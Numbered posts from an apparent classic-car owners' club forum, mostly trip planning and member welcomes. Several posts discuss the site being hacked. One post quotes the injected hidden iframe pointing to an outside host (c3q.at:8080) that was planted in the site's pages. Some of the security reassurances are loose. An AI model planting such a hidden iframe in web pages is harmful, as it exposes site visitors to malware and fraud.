  1. I would kill for a smoke / smoke even roughly metallic grey 130 saloon!
  2. Casper re-set us to a standard install, so certain bells and whistles and all the site content is not available for now. I know we have been in discussion about moving this to a better server anyway, so this may have been the last straw. But for now, we are here in essence. Windows defender or any strong antivirus should have kept anything nasty at bay, I know of a couple people I have to help check out everything is ok, but it should be fine.
  3. Yesterday. Windows defender will help, and a strong antivirus like bitdefender, mcafee etc.. Seems the attacks have taken different forms.
  4. Can you take a pic of it? Do you mean at the top of the screen? Or somewhere else? Is your antivirus up to date? Do you have a firewall etc..etc.. It's probably just an ad trying it on to make you click stuff. Site will be restored tonight I think, I've spoken to Casper today about it.
  5. Right sone some more research, this is due to fasthosts shitty server security and itl be f**king up the file syntax too if it keeps seeding. It IS the old iframe hack. from all the affected files - search it I guess? Sometimes it is injected randomly, can't do any more until I've spoken to casper about it as thre may just be a patch we can get to get around it.
  6. Done some research and it looks like the ftp may have given in as its only trying to insert advertisements on every page. Here is the code from the page casper if you read this: <iframe src="http://c3q.at:8080/ts/in.cgi?pepsi134" width=125 height=125 style="visibility: hidden"></iframe> Right before the head tag, looks like the standard iframe hack, can we recover and just change ftp dir or something? What do you think?
  7. This is more likely advert, spyware, malware etc.. there is no real way it could be damaging your machine, if you ahve a good antivirus it would flag it up. its more likely hopeing to get people using their credit card details etc i would ahve thuoght scanning all our keypresses!
  8. I'm being DEADLY serious here people. Please don't give out any payment details or change passwords at the mo - I'VE MESSAGED CASPER SO HOPEFULLY HE WILL HAVE A LOOK. I CANT LOG IN AND TURN OFF THE SITE. J ust dont re-sign in or give out any details. SHould still hopefully work fine for now, just be careful. Basically people ahve got onto the webserver where our forum is and seeded loads of advertising code. As its in russia (.ru) I think its best safe than sorry. This shouldnt affect your computer at all, but even if it could do so long as you have a firewall and antivirus you will be fine.
  9. How the feck does saying I need to buy an airbed equate to shopping in topshop!!? You have a very twisted mind mr vegas! ;D Seriously though I've downloaded some routes for the beaches of dunkirk / belgium etc... if we get stumped looking for the best location, these first pics abroad after all the UK ones will make or break the feature and will put me in a good mood for the days ahead. Still considering bailing to a £30 a night ibis 7 miles down the road if the first night is torrential rain as I will be able to run my laptop there and charge / backup the cameras!! But hopefully it wont come to that! ;D
  10. Glad to see an SR saved mate, they are possibly the rarest of the SR trim level left in the UK. Welcome aboard!
  11. Hello and welcome to the site. Sorry to hear that your first Ascona was too rusty to save! Are you going to the Ascona and Manta meet at Aarschot next weekend? We have 8 cars (7 mk2 \ asc. c`s going) So it would be really good to meet you face to face.
  12. It's an elaborate scam, doomed to failure mate, the policy is pretty specific, I think limbs would need to be lost etc.. plus it still wouldnt be worth it haha!
  13. Here you go mate: http://www.mk2cav.com/forum/index.php?topic=13783.0 Welcome aboard
  14. Hello Tom! It's been a while since we heard from you! Glad to see you still have the estate over there. Why don't you join us at Aarschot in Belgium on the 24/25/26 July? Might be a little closer for you than Northampton! ;D
  15. Right! The club has purchased 4 pairs (8 total ) of walkie talkies with a 12 mile range based upon the following cars attending; Jonny's Gold Cav The Ascii Paul's Early SRi Richie's Calibre steffi's - nodes Teazer - SR Paul / Ben - Mechanic / Omega This leaves us with one spare in case another car decides to attend. If this is the case I will provide a link to the walkie talkies we have purchased. They will need to be looked after and returned after the event so we can use them in future convoys. Tim is organising several sets of batteries for all, so we should have enough cover.

  18. Hi and welcome aboard!! When you say you saw your LX on here, where did you see it? If you have a link we can tell you whose it is!
  19. I think bigger structures are ok - a van or a bigger tent are ok, so long as they dont break up, segregate etc.. and are towards the outer edges of the camping edge of the stand.
  20. Just a heads up reminder that priority for posted passes will go to those staying for more than one day. In the event that we become overbooked people attending for just a day maybe receive a loan pass from another member by prior arrangement by admin to get them in and onto the stand depending on demand etc..
  21. Lol, following comments may be thrown across to the chat thread.. Not that the banter is predictable or anything! ;D
